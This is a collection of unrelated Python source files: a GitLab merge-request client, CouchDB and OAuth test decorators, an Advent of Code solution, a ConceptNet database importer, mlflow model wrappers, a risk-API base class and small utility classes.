'FASTQs', 'tumor1.fq') # tumor_fq2_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'tumor2.fq') # tumor_sample_id = "TARGET-30-PALHVD-01A-01W" # normal_sample_id = "TARGET-30-PALHVD-10A-01W" #build the normal bam object # normal_bam = BAM(os.path.join(StaticPath.base_dir, 'out_files', # normal_sample_id,'bams', normal_sample_id+'.sorted.merged.markdup.bqsr.bam')) # tumor_bam = BAM(os.path.join(StaticPath.base_dir, 'out_files', tumor_sample_id, # 'bams',tumor_sample_id+'.sorted.merged.markdup.bqsr.bam'))
StarcoderdataPython
1649264
from __future__ import absolute_import from future import standard_library standard_library.install_aliases() from builtins import input from builtins import str from .BaseService import BaseService import json import sys #required from urllib.parse import urljoin from urllib.parse import quote import requests class GitLabService(BaseService): SERVICE_NAME = "gitlab" def _API(self): url = 'https://%s/' % self.origin_domain path = 'api/v4/' return urljoin(str(url), str(path)) def parent_branch_exists(self, token): url_path = 'projects/%s/repository/branches/%s' % (self._url_encoded_path(), self.parent_branch) url = self._API() + url_path try: res = requests.get( url, headers={"PRIVATE-TOKEN": token} ) except Exception as e: self.logger.fatal(e) sys.exit() if res.status_code == 404: return False return True def issue_pull_request(self, obj): try: merge_message = obj['message'] api_token = obj['api_token'] except KeyError: self.logger.fatal("GitLabService::issue_pull_request has incorrect parameters @%s" % obj) sys.exit() params = { 'source_branch': self.source_branch, 'target_branch': self.parent_branch, 'title': merge_message } path = 'projects/%s/merge_requests' % self._url_encoded_path() url = urljoin(str(self._API()), str(path)) headers = {"PRIVATE-TOKEN": api_token} res = {} try: res = requests.post( url, headers=headers, data=params ) except Exception as e: self.logger.fatal(e) sys.exit() json_response = json.loads(res.text) if res.status_code == 401: # Invalid credentials. Revoke token and start over. return (None, res.status_code) elif res.status_code >= 400: try: err_msg = str(json_response['message'][0]) except: err_msg = '' return ("Could not create merge request %s" % (err_msg), res.status_code) elif res.status_code == 201: try: pr_href = json_response["web_url"] except: pr_href = "Merge request succeeded, but no URL was returned." return (pr_href, None) else: return (json_response, None) def _url_encoded_path(self): # https://docs.gitlab.com/ce/api/README.html#namespaced-path-encoding return quote('%s/%s' % (self.namespace, self.project), safe='') def _setup_token(self): self.logger.warn("\n\n(One Time Setup) Please create a Personal Access Token") self.logger.warn("https://%s/profile/personal_access_tokens" % self.origin_domain) self.logger.warn("Scope: API, Expires: Never\n") token = input("Please enter your Personal Access Token: ") # Make request to resource that requires us to be authenticated path = 'projects/%s/labels' % self._url_encoded_path() url = urljoin(str(self._API()), path) res = requests.get( url, headers={"PRIVATE-TOKEN": token} ) if res.status_code == 200: return(token, None) return(-1, "Invalid Personal Access Token")
StarcoderdataPython
1798581
''' Created on Oct 11, 2011 @author: jklo ''' from contextlib import closing from functools import wraps from ijson.parse import items from lr.lib.signing import reloadGPGConfig from pylons import config from uuid import uuid1 from LRSignature.sign.Sign import Sign_0_21 import base64 import copy import couchdb import gnupg import ijson import json import logging import os import shutil import tempfile import time import urllib, urlparse, oauth2, socket, uuid import urllib2 log = logging.getLogger(__name__) class SetFlowControl(object): def __init__(self,enabled,serviceDoc,doc_limit=100,id_limit=100): server = couchdb.Server(config['couchdb.url.dbadmin']) self.nodeDb = server[config['couchdb.db.node']] self.enabled = enabled self.serviceDoc = serviceDoc self.doc_limit=doc_limit self.id_limit=id_limit def __call__(self,f): @wraps(f) def set_flow_control(obj, *args, **kw): serviceDoc = self.nodeDb[self.serviceDoc] service_data = copy.deepcopy(serviceDoc['service_data']) serviceDoc['service_data']['flow_control'] = self.enabled serviceDoc['service_data']['doc_limit'] = self.doc_limit serviceDoc['service_data']['id_limit'] = self.id_limit self.nodeDb[self.serviceDoc] = serviceDoc try: return f(obj, *args, **kw) finally: serviceDoc['service_data'] = service_data self.nodeDb[self.serviceDoc] = serviceDoc return set_flow_control class ModifiedServiceDoc(object): def __init__(self, service_doc_id, update=None): server = couchdb.Server(config['couchdb.url.dbadmin']) self.nodeDb = server[config['couchdb.db.node']] self.service_doc_id = service_doc_id self.update_fn = update def __call__(self,f): @wraps(f) def wrapped(*args, **kw): orig_serviceDoc = self.nodeDb[self.service_doc_id] copy_serviceDoc = copy.deepcopy(orig_serviceDoc) if self.update_fn: copy_serviceDoc =self.update_fn(copy_serviceDoc) self.nodeDb[self.service_doc_id] = copy_serviceDoc try: return f(*args, **kw) finally: orig_serviceDoc["_rev"] = self.nodeDb[self.service_doc_id]["_rev"] self.nodeDb[self.service_doc_id] = orig_serviceDoc return wrapped def update_authz(basicauth=False, oauth=False): def update(orig): orig["service_auth"] = orig["service_auth"] or { } orig["service_auth"]["service_authz"] = [] if basicauth == True: orig["service_auth"]["service_authz"].append("basicauth") if oauth == True: orig["service_auth"]["service_authz"].append("oauth") if len(orig["service_auth"]["service_authz"]) == 0: orig["service_auth"]["service_authz"].append("none") return orig return update def ForceCouchDBIndexing(): json_headers = {"Content-Type": "application/json"} couch = { "url": config["couchdb.url"], "resource_data": config["couchdb.db.resourcedata"] } def indexTestData(obj): opts = { "startkey":"_design/", "endkey": "_design0", "include_docs": True } design_docs = obj.db.view('_all_docs', **opts) for row in design_docs: if "views" in row.doc and len(row.doc["views"].keys()) > 0: for view in row.doc["views"].keys(): # view = row.doc["views"].keys()[0] view_name = "{0}/_view/{1}".format( row.key, view) index_opts = { "limit": 1, "descending": 'true'} if "reduce" in row.doc["views"][view]: index_opts["reduce"] = 'false' # log.debug("Indexing: {0}".format( view_name)) req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch), headers=json_headers) try: res = urllib2.urlopen(req) except Exception, e: log.info("Problem indexing: %s", req) # view_result = obj.db.view(view_name, **index_opts) # log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read()))) else: pass#log.error("Not Indexing: {0}".format( row.key)) def test_decorator(fn): def test_decorated(self, *args, **kw): try: #print "Wrapper Before...." indexTestData(self) return fn(self, *args, **kw) except : raise finally: indexTestData(self) #print "Wrapper After...." return test_decorated return test_decorator def PublishTestDocs(sourceData, prefix, sleep=0, force_index=True): json_headers = {"Content-Type": "application/json"} test_data_log = "test-data-%s.log" % prefix couch = { "url": config["couchdb.url"], "resource_data": config["couchdb.db.resourcedata"] } @ModifiedServiceDoc(config['lr.publish.docid'], update_authz()) def writeTestData(obj, **kw): try: key = kw["pgp_keys"][0] signer = Sign_0_21(privateKeyID=key["fingerprint"], passphrase=key["passphrase"], gnupgHome=kw["gnupghome"], gpgbin=kw["gpgbin"], publicKeyLocations=key["locations"]) except: signer = None if not hasattr(obj, "test_data_ids"): obj.test_data_ids = {} obj.test_data_ids[prefix] = [] with open(test_data_log, "w") as plog: for doc in sourceData: if "doc_ID" not in doc: doc["doc_ID"] = prefix+str(uuid1()) try: doc = signer.sign(doc) except: pass obj.app.post('/publish', params=json.dumps({"documents": [ doc ]}), headers=json_headers) plog.write(doc["doc_ID"] + os.linesep) obj.test_data_ids[prefix].append(doc["doc_ID"]) if sleep > 0: time.sleep(sleep) kw["test_data_ids"] = obj.test_data_ids[prefix] return kw def indexTestData(obj): if force_index == False: return opts = { "startkey":"_design/", "endkey": "_design0", "include_docs": True } design_docs = obj.db.view('_all_docs', **opts) for row in design_docs: if "views" in row.doc and len(row.doc["views"].keys()) > 0: for view in row.doc["views"].keys(): # view = row.doc["views"].keys()[0] view_name = "{0}/_view/{1}".format( row.key, view) index_opts = { "limit": 1, "descending": 'true'} if "reduce" in row.doc["views"][view]: index_opts["reduce"] = 'false' # log.error("Indexing: {0}".format( view_name)) req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch), headers=json_headers) try: res = urllib2.urlopen(req) except Exception, e: log.info("Problem forcing index: %s", e) # view_result = obj.db.view(view_name, **index_opts) # log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read()))) else: pass# log.error("Not Indexing: {0}".format( row.key)) def cacheTestData(obj, **kw): req = urllib2.Request("{url}/{resource_data}/_all_docs?include_docs=true".format(**couch), data=json.dumps({"keys":obj.test_data_ids[prefix]}), headers=json_headers) res = urllib2.urlopen(req) docs = list(items(res, 'rows.item.doc')) if not hasattr(obj, "test_data_sorted"): obj.test_data_sorted = {} def sortkey(k): try: return k['node_timestamp'] except: return k['create_timestamp'] obj.test_data_sorted[prefix] = sorted(docs, key=lambda k: sortkey(k)) kw["test_data_sorted"] = obj.test_data_sorted[prefix] return kw def removeTestData(obj): for doc_id in obj.test_data_ids[prefix]: try: del obj.db[doc_id] except Exception as e: print e.message try: del obj.db[doc_id+"-distributable"] except Exception as e: print e.message try: del obj.test_data_ids[prefix] except Exception as e: print e.message try: del obj.test_data_ids[prefix] except Exception as e: print e.message def test_decorator(fn): def test_decorated(self, *args, **kw): try: #print "Wrapper Before...." kw = writeTestData(self, **kw) indexTestData(self) kw = cacheTestData(self, **kw) return fn(self, *args, **kw) except : raise finally: removeTestData(self) indexTestData(self) #print "Wrapper After...." return test_decorated return test_decorator def getExtraEnvironment(base_url=None): env = {} if base_url: scheme, netloc, path, query, fragment = urlparse.urlsplit(base_url) if query or fragment: raise ValueError( "base_url (%r) cannot have a query or fragment" % base_url) if scheme: env['wsgi.url_scheme'] = scheme if netloc: if ':' not in netloc: if scheme == 'http': netloc += ':80' elif scheme == 'https': netloc += ':443' else: raise ValueError( "Unknown scheme: %r" % scheme) host, port = netloc.split(':', 1) env['SERVER_PORT'] = port env['SERVER_NAME'] = host env['HTTP_HOST'] = netloc if path: env['SCRIPT_NAME'] = urllib.unquote(path) return env class OAuthRequest(object): def __init__(self, path, http_method="GET", url_base="http://www.example.com", oauth_user_attrib="oauth_user", oauth_info_attrib="oauth" ): self.oauth_user_attrib = oauth_user_attrib self.oauth_info_attrib = oauth_info_attrib self.http_method = http_method self.url_base = url_base self.path = path self.server = couchdb.Server(config['couchdb.url.dbadmin']) self.users = self.server[config['couchdb.db.users']] def __call__(self, fn): def create_user(oauth_user): try: del self.users[oauth_user["_id"]] except: pass finally: print oauth_user self.users.save(oauth_user) def remove_user(oauth_user): try: del self.users[oauth_user["_id"]] except: pass @wraps(fn) def test_decorator(cls, *args, **kwargs): if (hasattr(cls, self.oauth_user_attrib)): self.oauth_user = getattr(cls, self.oauth_user_attrib) else: err = AttributeError() err.message = "Missing attribute '%s' which should be data for CouchDB OAuth User" % self.oauth_user_attrib raise err consumer = oauth2.Consumer(key=self.oauth_user["name"], secret=self.oauth_user["oauth"]["consumer_keys"][self.oauth_user["name"]]) token = oauth2.Token(key="node_sign_token", secret=self.oauth_user["oauth"]["tokens"]["node_sign_token"]) params = { "oauth_signature_method": "HMAC-SHA1", } req = oauth2.Request.from_consumer_and_token(consumer, token, http_method=self.http_method, http_url="{0}{1}".format(self.url_base, self.path), parameters=params) # Sign the request. signature_method = oauth2.SignatureMethod_HMAC_SHA1() req.sign_request(signature_method, consumer, token) header = req.to_header() header["Authorization"] = str(header["Authorization"]) extraEnv = getExtraEnvironment(self.url_base) class OauthInfo(object): def __init__(self, consumer, token, request, header, extraEnv, path): self.consumer = consumer self.token = token self.request = request self.header = header self.env = extraEnv self.path = path setattr(cls, self.oauth_info_attrib, OauthInfo(consumer, token, req, header, extraEnv, self.path)) try: create_user(self.oauth_user) result = fn(cls, *args, **kwargs) return result finally: delattr(cls, self.oauth_info_attrib) remove_user(self.oauth_user) return test_decorator class BasicAuthRequest(object): def __init__(self, bauth_user_attrib="bauth_user", bauth_info_attrib="bauth" ): self.bauth_user_attrib = bauth_user_attrib self.bauth_info_attrib = bauth_info_attrib self.server = couchdb.Server(config['couchdb.url.dbadmin']) self.users = self.server[config['couchdb.db.users']] def __call__(self, fn): def build_basic_auth_header(name, password): base64string = base64.encodestring('%s:%s' % (name, password))[:-1] return {"Authorization": "Basic %s" % base64string} def create_user(name, password, roles=[]): user_doc = { "_id" : "org.couchdb.user:{0}".format(name), "type" : "user", "name" : "{0}".format(name), "roles" : roles, "password" : password } try: del self.users[user_doc["_id"]] except: pass finally: _, user_doc["_rev"] = self.users.save(user_doc) return user_doc def delete_user(user_doc): try: del self.users[user_doc["_id"]] except: pass class BAuthInfo(object): def __init__(self, header, name, password): self.header = header self.username = name self.password = password @wraps(fn) def wrap(cls, *args, **kwargs): try: self.bauth_user = getattr(cls, self.bauth_user_attrib) except: raise AttributeError("Attribute containing Basic Auth user credentials missing.") user_doc = create_user(**self.bauth_user) header = build_basic_auth_header(**self.bauth_user) setattr(cls, self.bauth_info_attrib, BAuthInfo(header, **self.bauth_user)) try: return fn(cls, *args, **kwargs) except Exception as e: raise e finally: delete_user(user_doc) return wrap def _backup(prop_list=[]): backup = {} for prop in prop_list: backup[prop] = config["app_conf"][prop] return backup def _restore(backup={}): config["app_conf"].update(backup) class make_gpg_keys(object): '''decorator that makes at least 1 gpg key. first key is set at the node key''' def __init__(self, count=1): self.count = count self.gnupghome = tempfile.mkdtemp(prefix="gnupg_", dir=".") self.gpgbin = "gpg" self.gpg = gnupg.GPG(gnupghome=self.gnupghome, gpgbinary=self.gpgbin) self.gpg.encoding = 'utf-8' self.keys = [] def __call__(self, f): @wraps(f) def wrapped(*args, **kw): for i in range(self.count): cfg = { "key_type": "RSA", "key_length": 1024, "name_real": "Test Key #%d" % i, "name_comment": "Test key for %s" % f.__class__.__name__, "name_email": "<EMAIL>" % i, "passphrase": "<PASSWORD>" } key = self.gpg.gen_key(self.gpg.gen_key_input(**cfg)) assert key is not None, "GPG key not generated" assert key.fingerprint is not None, "Key missing fingerprint" cfg.update({ "key": key, "fingerprint": key.fingerprint, "key_id": key.fingerprint[-16:], "locations": ["http://www.example.com/pubkey/%s" % key.fingerprint[-16:] ], "owner": "%s (%s)" % (cfg["name_real"], cfg["name_email"]) }) self.keys.append(cfg) kw["pgp_keys"] = self.keys kw["gnupghome"] = self.gnupghome kw["gpgbin"] = self.gpgbin kw["gpg"] = self.gpg backup_props = [ "lr.publish.signing.privatekeyid", "lr.publish.signing.passphrase", "lr.publish.signing.gnupghome", "lr.publish.signing.gpgbin", "lr.publish.signing.publickeylocations", "lr.publish.signing.signer" ] backup_conf = _backup(backup_props) config["app_conf"].update({ "lr.publish.signing.privatekeyid": self.keys[0]["key_id"], "lr.publish.signing.passphrase": self.keys[0]["passphrase"], "lr.publish.signing.gnupghome": self.gnupghome, "lr.publish.signing.gpgbin": self.gpgbin, "lr.publish.signing.publickeylocations": '''["http://localhost/pubkey"]''', "lr.publish.signing.signer": self.keys[0]["owner"] }) reloadGPGConfig(config["app_conf"]) try: return f(*args, **kw) finally: shutil.rmtree(self.gnupghome) _restore(backup_conf) reloadGPGConfig(config["app_conf"]) return wrapped
StarcoderdataPython
1667766
# Advent of Code 2021 - Day 2 Part 2 # Author: <NAME> # Created: 12/02/2021 # Last Modified: 12/02/2021 # Purpose: # Read in submarine instructions from a file # Commands: # Forward -> Increase horizontal position, # Change vertical position by product of aim and Forward command # Up -> Decrease aim position # Down -> Increase aim position # Determine final horizontal and vertical(depth) position # Determine product of final horizontal and vertical(depth) position # get data from file sample = 'day2-sample.txt' actual = 'day2-input.txt' fileName = actual try: fh = open(fileName) except: print(f'File {fileName} not found') commands = [x.split() for x in fh] fh.close() # start logic movements = {'forward' : 0, 'aim' : 0, 'depth' : 0} for command in commands: if command[0] == 'forward': movements['forward'] = movements.get('forward', 0) + int(command[1]) movements['depth'] = movements.get('depth') + (movements.get('aim', 0) * int(command[1])) elif command[0] == 'up': movements['aim'] = movements.get('aim', 0) - int(command[1]) elif command[0] == 'down': movements['aim'] = movements.get('aim', 0) + int(command[1]) print(movements) print(f'Final Horizontal: {movements["forward"]} \nFinal Depth: {movements["depth"]}') print(f'Horizontal * Depth = {movements["forward"] * movements["depth"]}')
StarcoderdataPython
74926
# Copyright (c) 2020 <NAME> # # This software is released under the MIT License. # https://opensource.org/licenses/MIT from __future__ import annotations import argparse import csv import gzip import json import os import re import sqlite3 as sqlite from .app import database, APP_DIRECTORY from .models.assertions import Assertion, Dataset, License, Relation, Source from .models.concepts import Concept, Language, PartOfSpeech parser = argparse.ArgumentParser() parser.add_argument("conceptnet", action="store", type=str, help="Compiled ConceptNet assertions file (csv.gz)") parser.add_argument("description", action="store", type=str, help="Directory containing the description files (csv)") parser.add_argument("--commit-size", action="store", type=int, default=1000, help="The batch size of the database commit") INITIALIZATION_SQL = os.path.join(APP_DIRECTORY, "initialization.sql") TRANSFORMATION_SQL = os.path.join(APP_DIRECTORY, "transformation.sql") ENGLISH_REGEX = re.compile(r"^/a/\[/r/.+/,/c/en/.+/,/c/en/.+/\]$") CONCEPT_REGEX = re.compile(r"^/c/([^/]+)/([^/]+)/?([^/]+)?/?(.+)?$") if __name__ == "__main__": args = parser.parse_args() LANGUAGE = os.path.join(args.description, "languages.csv") RELATION = os.path.join(args.description, "relations.csv") PART_OF_SPEECH = os.path.join(args.description, "part-of-speeches.csv") # process data using in-memory database with sqlite.connect(":memory:") as temp_database: temp_database.row_factory = sqlite.Row cursor = temp_database.cursor() with open(INITIALIZATION_SQL, "r") as script: cursor.executescript(script.read()) temp_database.commit() with open(LANGUAGE, "r") as file: for language in csv.reader(file): cursor.execute( "INSERT INTO languages(code, name) VALUES(?,?)", language ) with open(RELATION, "r") as file: for relation, directed in csv.reader(file): cursor.execute( "INSERT INTO relations(relation, directed) VALUES(?,?)", (relation, directed == "directed") ) with open(PART_OF_SPEECH, "r") as file: for part_of_speech in csv.reader(file): cursor.execute( "INSERT INTO part_of_speeches(code, name) VALUES(?,?)", part_of_speech ) temp_database.commit() with gzip.open(args.conceptnet, "rt") as conceptnet: reader = csv.reader(conceptnet, delimiter='\t') filtered = filter(lambda x: re.match(ENGLISH_REGEX, x[0]), reader) for id, assertion in enumerate(filtered): print(f"{id + 1} English assertions processed", end='\r') assertion, relation, source, target, data = assertion if relation == "/r/ExternalURL": continue data = json.loads(data) cursor.execute( "INSERT INTO assertions VALUES(" + "?," * 18 + "?)", (id + 1, assertion, relation[3:], source, *re.match(CONCEPT_REGEX, source).groups(), target, *re.match(CONCEPT_REGEX, target).groups(), data["dataset"][3:], data["license"], data["weight"], data["surfaceText"] if "surfaceText" in data else None, data["surfaceStart"] if "surfaceStart" in data else None, data["surfaceEnd"] if "surfaceEnd" in data else None) ) for index, source in enumerate(data["sources"]): for field, value in source.items(): cursor.execute( ("INSERT INTO sources" "(assertion_id, [index], field, value) " "VALUES(?,?,?,?)"), (id + 1, index + 1, field, value) ) print() temp_database.commit() with open(TRANSFORMATION_SQL, "r") as script: cursor.executescript(script.read()) temp_database.commit() # populate app database database.drop_all() database.create_all() for r in cursor.execute("SELECT * FROM languages"): database.session.add(Language(**r)) for r in cursor.execute("SELECT * FROM relations"): database.session.add(Relation(**r)) for r in cursor.execute("SELECT * FROM part_of_speeches"): database.session.add(PartOfSpeech(**r)) for r in cursor.execute("SELECT * FROM datasets"): database.session.add(Dataset(**r)) for r in cursor.execute("SELECT * FROM licenses"): database.session.add(License(**r)) for i, r in enumerate(cursor.execute("SELECT * FROM concepts")): print(f"{i + 1} concepts inserted", end='\r') database.session.add(Concept(**r)) if (i + 1) % args.commit_size == 0: database.session.commit() print() for i, r in enumerate(cursor.execute("SELECT * FROM assertions")): print(f"{i + 1} assertions inserted", end='\r') database.session.add(Assertion(**r)) if (i + 1) % args.commit_size == 0: database.session.commit() print() for i, r in enumerate(cursor.execute("SELECT * FROM sources")): print(f"{i + 1} assertion source inserted", end='\r') database.session.add(Source(**r)) if (i + 1) % args.commit_size == 0: database.session.commit() print() database.session.commit()
StarcoderdataPython
27779
from typing import List, Tuple import mlflow import numpy as np import pandas as pd from sklearn.model_selection import train_test_split from interpret.glassbox import ExplainableBoostingClassifier, ExplainableBoostingRegressor from ..OEA_model import OEAModelInterface, ModelType, ExplanationType from ..modeling_utils import log_metrics class mlflow_pyfunc_wrapper(mlflow.pyfunc.PythonModel): """ Wrapper class that allows us to use generic predictors in the mlflow pyfunc format. Used to wrap predictor types that are not already in the mlflow.* setup. In order to work with this class, needs to have generic: predict, fit, score, predict_proba functions """ def __init__(self, model): """ Initialized Wrapped python model Parameters ---------- model: Python Object A model that implements the predict, fit, score, and predict_proba functions """ self.model = model def predict(self, *args): """ Use Predict function of wrapped model Parameters ---------- *args : Arguments needed for wrapped predict function Returns ------- predictions: pandas.DataFrame or numpy.ndarray Predictions of wrapped model on passed arguments """ predictions = self.model.predict(*args) return predictions def fit(self, *args): """ Train/Fit Wrapped model on passed arguments Parameters ---------- *args : Arguments needed for wrapped fit(train) function Returns ------- Wrapped model after being fit on passed arguments """ return self.model.fit(*args) def score(self, *args): """ Predicts and Scores the wrapped model on passed arguments Parameters ---------- *args : Arguments needed for wrapped score function Returns ------- score: Float Resulting score of wrapped model score function. (Generally accuracy) """ score = self.model.score(*args) return score def predict_proba(self,*args): """ Generate prediction probabilities of the wrapped model on passed arguments Parameters ---------- *args : Arguments needed for wrapped prediction probability functin Returns ------- probabilities: pandas.DataFrame or numpy.ndarray Predicted output probabilities """ probabilities = self.model.predict_proba(*args) return probabilities class wrapped_basic(OEAModelInterface): def __init__(self, modelname): """ Initialize Basic Wrapped Pyfunc Model utilities (base class) Parameters ---------- modelname: String Name of the model for registration and saving purposes """ self.predictor = None self.modelname = modelname def load_split_data(self, X, Y, A, key, split=.4, stratify=None): """ Splits Data into training, validation, and test sets Parameters ---------- X: pandas.DataFrame Feature data Y: pandas.DataFrame Label data A: pandas.DataFrame Senstive Feature data (may or may not be overlap with X) key: String or List[Strings] Columns to identify as Keys for all three dataframes. Dropped at loading time. split: Float Percentage of data to exclude for testing set stratify: pandas.DataFrame Dataframe used to stratify split of data. I.e. if labels are provided, will ensure equal label distribution in train / test sets. Returns ------- X_train: pandas.DataFrame Feature data for training set X_val: pandas.DataFrame Feature data for validation set X_test: pandas.DataFrame Feature data for test set y_train: pandas.DataFrame Label data for training set y_val: pandas.DataFrame Label data for validation set y_test: pandas.DataFrame Label data for test set A_train: pandas.DataFrame Senstive Feature data for training set A_val: pandas.DataFrame Senstive Feature data for validation set A_test: pandas.DataFrame Senstive Feature data for test set classes: List[str] List of classes for classification problem outcomes """ if not (A is None): ( X_train, X_val_test, y_train, y_val_test, A_train, A_val_test, ) = train_test_split( X, Y, A, test_size=split, random_state=12345, stratify=stratify, ) (X_val, X_test, y_val, y_test, A_val, A_test) = train_test_split( X_val_test, y_val_test, A_val_test, test_size=0.5, random_state=12345 ) else: (X_train, X_val_test, y_train, y_val_test) = train_test_split( X, Y, test_size=split, random_state=12345, stratify=stratify, ) (X_val, X_test, y_val, y_test) = train_test_split( X_val_test, y_val_test, test_size=0.5, random_state=12345 ) X_train = X_train.drop(key, axis='columns').reset_index(drop=True) X_val = X_val.drop(key, axis='columns').reset_index(drop=True) X_test = X_test.drop(key, axis='columns').reset_index(drop=True) y_train = y_train.drop(key, axis='columns') y_train = y_train[y_train.columns[:1]].reset_index(drop=True) y_val = y_val.drop(key, axis='columns').reset_index(drop=True) y_val = y_val[y_val.columns[:1]].reset_index(drop=True) y_test = y_test.drop(key, axis='columns').reset_index(drop=True) y_test = y_test[y_test.columns[:1]].reset_index(drop=True) classes = None self.X_train = X_train self.X_val = X_val self.X_test = X_test self.y_train = y_train.values.reshape(-1) self.y_val = y_val.values.reshape(-1) self.y_test = y_test.values.reshape(-1) self.classes = classes if not(A is None): A_train = A_train.drop(key, axis='columns').reset_index(drop=True) A_val = A_val.drop(key, axis='columns').reset_index(drop=True) A_test = A_test.drop(key, axis='columns').reset_index(drop=True) self.A_train = A_train self.A_val = A_val self.A_test = A_test else: A_train = None A_val = None A_test = None self.A_train = A_train self.A_val = A_val self.A_test = A_test return ( X_train, X_val, X_test, y_train, y_val, y_test, A_train, A_val, A_test, classes, ) def infer(self, data): """ Infer using model Parameters ---------- data: pandas.DataFrame OR numpy array Feature data Returns ------- predictions: pandas.DataFrame OR numpy array Results of running inference of the predictor """ return self.predictor.predict(data) def train(self): """ Trains model based on data originally loaded using load_split_data. Logs training metrics. Returns ------- self.predictor: sklearn Predictor Trained predictor model object """ X_train_val = pd.concat([self.X_train, self.X_val], axis=0) y_train_val = np.concatenate([self.y_train, self.y_val], axis=0) self.predictor.fit(X_train_val, y_train_val) log_metrics(self, dataset="training_val") return self.predictor def test(self): """ Evaluates model on the test set originally loaded using load_split_data. Logs testing metrics and returns predictions on test set. Returns ------- preds: pandas.DataFrame OR numpy array Results of running inference of the predictor """ preds = log_metrics(self, dataset="test") return preds def save_model(self, foldername): """ Save Wrapped Pyfunc Model to a Path Parameters ---------- foldername: String Name of intermediate folder to save model to using mlflow utilities. """ mlflow.pyfunc.save_model(foldername, python_model=self.predictor) def register_model(self, foldername): """ Register Model to repository attached to mlflow instance Parameters ---------- foldername: String Path of folder to upload to model repository """ mlflow.pyfunc.log_model(foldername, python_model=self.predictor, registered_model_name=self.modelname) def load_model(self, modelname, version): """ Load Model from a registered endpoint Parameters ---------- modelname: String name of model to load from remote repository version: String version of model to load from mllow model repository. Returns ------- self.predictor: Wrapped PyFunc Predictor Returns the predictor loaded from the registered endpoint """ model_version_uri = "models:/{model_name}/{version}".format(model_name=modelname,version=version) self.predictor = mlflow.pyfunc.load_model(model_version_uri) return self.predictor class classification_EBM(wrapped_basic): """ Model Class for EBM used for Binary CLassification. Inherits from base wrapped model class (OEA Interface Type) Classification type with Eplainable Boosting Machine special explanation type """ model_type = ModelType.binary_classification explanation_type = ExplanationType.ebm def init_model(self, seed=5): """Initialize Model""" self.predictor = mlflow_pyfunc_wrapper(ExplainableBoostingClassifier(random_state=seed)) class multi_classification_EBM(wrapped_basic): """ Model Class for EBM used for Multiclass CLassification. Inherits from base wrapped model class (OEA Interface Type) Multiclass Classification type with Eplainable Boosting Machine special explanation type """ model_type = ModelType.multiclass_classification explanation_type = ExplanationType.ebm def init_model(self, seed=5): """Initialize Model""" self.predictor = mlflow_pyfunc_wrapper(ExplainableBoostingClassifier(random_state=seed)) class regression_EBM(wrapped_basic): """ Model Class for EBM used for Regression. Inherits from base wrapped model class (OEA Interface Type) Regression type with Eplainable Boosting Machine special explanation type """ model_type = ModelType.regression explanation_type = ExplanationType.ebm def init_model(self, seed=5): """Initialize Model""" self.predictor = mlflow_pyfunc_wrapper(ExplainableBoostingRegressor(random_state=seed))
StarcoderdataPython
169038
""" Copyright 2019 <NAME>. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from abc import ABCMeta, abstractmethod from typing import Iterable, Union from gs_quant.risk import Formatters, RiskRequest class RiskApi(metaclass=ABCMeta): @classmethod @abstractmethod def calc(cls, request: RiskRequest) -> Union[Iterable, str]: raise NotImplementedError('Must implement calc') @classmethod @abstractmethod def get_results(cls, risk_request: RiskRequest, result_id: str) -> dict: raise NotImplementedError('Must implement get_results') @classmethod def _handle_results(cls, request: RiskRequest, results: Iterable) -> dict: formatted_results = {} for measure_idx, position_results in enumerate(results): risk_measure = request.measures[measure_idx] formatter = Formatters.get(risk_measure) for position_idx, result in enumerate(position_results): position = request.positions[position_idx] result = formatter(result) if formatter else result formatted_results.setdefault(risk_measure, {})[position] = result return formatted_results
StarcoderdataPython
4805410
<gh_stars>1-10 from collections import Counter class Solution: def frequencySort(self, s: str) -> str: counter = Counter(s) return "".join( k * v for k, v in sorted( counter.items(), key=lambda x: x[1], reverse=True ) ) def frequencySort1Line(self, s: str) -> str: return "".join(k * v for k, v in Counter(s).most_common()) # TESTS tests = [("tree", "eetr"), ("cccaaa", "cccaaa"), ("Aabb", "bbAa")] for t in tests: sol = Solution() actual = sol.frequencySort(t[0]) print("Sort characters in", t[0], "by frequency ->", actual) assert actual == t[1]
StarcoderdataPython
4840916
"""Form fields for using django-gm2m with QuerySetSequence.""" from dal_gm2m.fields import GM2MFieldMixin from dal_queryset_sequence.fields import QuerySetSequenceModelMultipleField class GM2MQuerySetSequenceField(GM2MFieldMixin, QuerySetSequenceModelMultipleField): """Form field for QuerySetSequence to django-generic-m2m relation."""
StarcoderdataPython
3260786
"""Module containing class `Preset`.""" from vesper.util.named import Named class Preset(Named): """ Preset parent class. A *preset* is a collection of logically related configuration data, for example for user interface or algorithm configuration. A preset is of a particular *preset type*, according to the type of information it contains. For example, a system may offer preset types for the configuration of different parts of its user interface, or for the configuration of different parametric algorithms. A preset type is implemented in Python as a subclass of the `Preset` class, and presets of that type are instances of the class. Presets are managed by a *preset manager*, which loads presets from a persistent store and provides them to clients upon request. The preset manager requires that each preset class define an initializer of the form def __init__(self, name, data): ... which the manager uses to create presets. The initializer accepts a preset name and serialized preset data, both of which are obtained by the preset manager from the persistent store. The initializer of a preset class should always invoke the initializer of its superclass. When preset data include key/value pairs where the keys are intended to function as programming language identifiers (when the keys are setting names, for example), the identifiers should be written in snake case. The `camel_case_data` property of a preset gets the preset data with such identifiers translated to camel case. Subclasses that need to perform such translation should define their own `camel_case_data` property. The default implementation of the property returns the preset data with no translation. """ extension_name = None """ The extension name of this preset type. A preset type is an extension, and thus must have an extension name. The name should be capitalized and describe the contents of the preset, for example "Annotation Commands" or "Annotation Scheme". The name is presented in user interfaces as the name of a preset type, and is also the name of the directory that contains presets of this type. """ def __init__(self, name, data): super().__init__(name) self.data = data @property def camel_case_data(self): return self.data
StarcoderdataPython
162129
